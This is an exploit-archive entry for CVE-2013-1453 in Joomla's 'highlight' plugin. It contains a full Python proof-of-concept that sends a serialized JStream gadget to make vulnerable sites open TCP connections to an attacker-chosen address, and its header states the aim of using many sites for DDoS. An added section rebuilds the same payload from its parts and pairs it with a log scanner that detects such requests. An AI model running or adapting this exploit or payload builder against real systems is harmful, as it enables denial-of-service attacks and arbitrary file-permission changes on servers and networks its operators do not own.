1337DAY-ID-20434
Published: Feb 25, 2013
Author: redeemer
Source: 0day.today

Joomla <=2.5.8, <=3.0.2 remote tcp connections opener

EPSS: 0.003 (percentile 66.3%)

The Joomla core plugin 'highlight' base64-decodes the `highlight` request parameter and passes the result to unserialize() without validating it. The plugin is enabled by default in a standard Joomla installation.
This proof-of-concept exploit uses the Joomla JStream class as the gadget. The serialized object carries a non-empty file handle and open mode 'w', so when the object is destroyed its destructor runs close(), and close() then chmods the stored filename; for an ftp:// filename that chmod is performed over FTP, so the target opens a TCP connection to whatever host:port the URL names. Many vulnerable Joomla instances can therefore be pointed at one address for a DDoS. (The same path with a local filename runs chmod on an arbitrary file with an arbitrary mode, within what the web server user is allowed to change.)
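The following is an added example, not part of the original exploit or of Joomla's own code. It rebuilds the JStream payload from its parts with a small PHP serializer, so the "\0*\0" protected-property encoding and the role of each field are visible rather than baked into one template string, and it pairs that with the triage side: a decoder that inspects the `highlight` parameter the way the plugin does and flags serialized PHP objects in web server log lines. The function names, the FTP credentials `u`/`p`, the sample hosts and the log lines are all constructed here for illustration.

```python
import base64
import re
from urllib.parse import unquote, urlsplit

# PHP serialize() writes a protected property "x" of any class as "\0*\0x".
PROT = "\0*\0"


class PhpObject:
    """A PHP object to serialize: class name plus an ordered property dict."""

    def __init__(self, cls, props):
        self.cls = cls
        self.props = props


def php_serialize(value):
    """Minimal PHP serialize() for None, int, str, dict (assoc array) and
    PhpObject. String lengths are counted in bytes, as PHP does."""
    if value is None:
        return "N;"
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, PhpObject):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return 'O:%d:"%s":%d:{%s}' % (len(value.cls), value.cls, len(value.props), body)
    raise TypeError("unsupported type %r" % type(value))


def jstream_gadget(connect_host, user="u", password="p"):
    """Base64 of a serialized JStream, property for property the page's template.
    _fh is non-empty so __destruct() calls close(); _openmode 'w' makes close()
    chmod the filename; an ftp:// filename turns that chmod into an FTP login,
    i.e. an outbound TCP connection to connect_host. Credentials are arbitrary."""
    props = {
        PROT + "filemode": 438,        # 0666
        PROT + "dirmode": 493,         # 0755
        PROT + "chunksize": 8192,
        PROT + "filename": "ftp://%s:%s@%s/s" % (user, password, connect_host),
        PROT + "writeprefix": "",
        PROT + "readprefix": "",
        PROT + "processingmethod": "f",
        PROT + "filters": {},
        PROT + "_fh": "1",
        PROT + "_filesize": None,
        PROT + "_context": None,
        PROT + "_contextOptions": {},
        PROT + "_openmode": "w",
        PROT + "_errors": {},
    }
    raw = php_serialize(PhpObject("JStream", props)).encode("latin-1")
    return base64.b64encode(raw).decode("ascii")


# A PHP object at a value position: start of input, or right after ';' or '{'.
PHP_OBJECT = re.compile(r'(?:^|[;{])O:(\d+):"([^"]+)":(\d+):\{')
FILENAME = re.compile(r'filename";s:\d+:"([^"]*)";')
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def decode_highlight(raw):
    """Decode a highlight value as the plugin does: lenient base64 (non-alphabet
    bytes dropped, like PHP's base64_decode), bytes kept as the serialized string."""
    return base64.b64decode(raw).decode("latin-1")


def inspect_highlight(query_string):
    """Return {'class', 'properties'[, 'filename']} when the highlight parameter
    carries a serialized PHP object, else None. A legitimate value is a plain
    array of search terms (a:N:{...}). '+' is kept, not turned into a space,
    so we decode what the sender intended."""
    m = re.search(r"(?:^|&)highlight=([^&]*)", query_string)
    if not m:
        return None
    try:
        decoded = decode_highlight(unquote(m.group(1)))
    except ValueError:   # bad padding etc.: not a usable payload
        return None
    obj = PHP_OBJECT.search(decoded)
    if not obj:
        return None
    finding = {"class": obj.group(2), "properties": int(obj.group(3))}
    fn = FILENAME.search(decoded)
    if fn:
        finding["filename"] = fn.group(1)
    return finding


def scan_log(lines):
    """Combined-format access log lines -> [(client_ip, finding), ...]."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            finding = inspect_highlight(urlsplit(m.group(2)).query)
            if finding:
                hits.append((m.group(1), finding))
    return hits


# Constructed sample lines (not from a real server): one attack, one unrelated
# request, one benign highlight value carrying a plain array of terms.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Feb/2013:00:00:01 +0000] "GET /?highlight=%s HTTP/1.1" 200 5120'
    % jstream_gadget("198.51.100.7:21"),
    '198.51.100.9 - - [25/Feb/2013:00:00:02 +0000] "GET /index.php?option=com_search&searchword=joomla HTTP/1.1" 200 9001',
    '192.0.2.33 - - [25/Feb/2013:00:00:03 +0000] "GET /?highlight=%s HTTP/1.1" 200 5120'
    % base64.b64encode(php_serialize({0: "joomla", 1: "cms"}).encode()).decode(),
]
```

Running `scan_log(SAMPLE_LOG)` reports only the first line, with class `JStream` and the ftp:// filename pointing at `198.51.100.7:21`; any `O:` object in this parameter is worth a look, since the plugin only ever expects an array of strings. The object-position regex is a triage heuristic: a search term that literally contains `;O:1:"x":1:{` would also match, and a deeper check would parse the serialized string properly.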

#!/usr/bin/env python3
#
# Joomla <=2.5.8, <=3.0.2 remote tcp connections opener
#
# Vendor homepage: www.joomla.org
# Versions affected: <=2.5.8, <=3.0.2
# Created: 2012-12-08
# Public disclosure: 2013-02-04
# CVE: CVE-2013-1453
#
# Joomla core plugin 'highlight' unserializes untrusted input. The plugin is
# enabled by default in a standard Joomla installation.
#
# This proof-of-concept exploit uses the JStream Joomla class to make the
# target open remote TCP connections to an address of the attacker's choice,
# so multiple vulnerable Joomla instances can be used for DDoS attacks.
#
# (The JStream class can also be used to chmod any file to any mode.)
#
# Author: Marcin "redeemer" Probola
#
import argparse
import base64
import http.client
import threading
from urllib.parse import quote

parser = argparse.ArgumentParser(description="Joomla <=2.5.8, <=3.0.2 remote tcp connections opener (CVE-2013-1453)")
parser.add_argument("-H", "--host", dest="host", default="localhost", help="Host with vulnerable joomla instance")
parser.add_argument("-C", "--connect", dest="connectHost", default="localhost:80", help="Make connection to (in format HOST:PORT)")
parser.add_argument("-T", "--threads", dest="threads", type=int, default=1, help="number of threads")
options = parser.parse_args()

# vars
host = options.host
connectHost = options.connectHost
threads = options.threads

# Serialized JStream object. Protected properties serialize as "\0*\0name".
# _fh is set so __destruct() runs close(); _openmode 'w' makes close() chmod the
# filename; an ftp:// filename makes that chmod connect to the remote host.
serializedTemplate = 'O:7:"JStream":14:{s:11:"\0*\0filemode";i:438;s:10:"\0*\0dirmode";i:493;s:12:"\0*\0chunksize";i:8192;s:11:"\0*\0filename";s:%d:"%s";s:14:"\0*\0writeprefix";s:0:"";s:13:"\0*\0readprefix";s:0:"";s:19:"\0*\0processingmethod";s:1:"f";s:10:"\0*\0filters";a:0:{}s:6:"\0*\0_fh";s:1:"1";s:12:"\0*\0_filesize";N;s:11:"\0*\0_context";N;s:18:"\0*\0_contextOptions";a:0:{}s:12:"\0*\0_openmode";s:1:"w";s:10:"\0*\0_errors";a:0:{}}'

# FTP URL with arbitrary credentials: the target only has to connect, the login
# may fail. (The password in this copy was mangled by e-mail obfuscation;
# 'p' is a stand-in.)
ftpConnectUrl = "ftp://u:p@" + connectHost + "/s"
serialized = serializedTemplate % (len(ftpConnectUrl), ftpConnectUrl)
# Percent-encode the base64 so a '+' is not turned into a space by the server.
serializedBase64 = quote(base64.b64encode(serialized.encode("latin-1")).decode("ascii"), safe="")

# thread class - blow (make http request)
class ThreadClass(threading.Thread):
    def run(self):
        conn = http.client.HTTPConnection(host)
        conn.request("GET", "/?highlight=" + serializedBase64)
        conn.getresponse()   # wait for the reply so the request is fully sent
        conn.close()

print(host + " connect(" + str(threads) + ") to " + connectHost + "\n")

# run threads
for i in range(threads):
    ThreadClass().start()
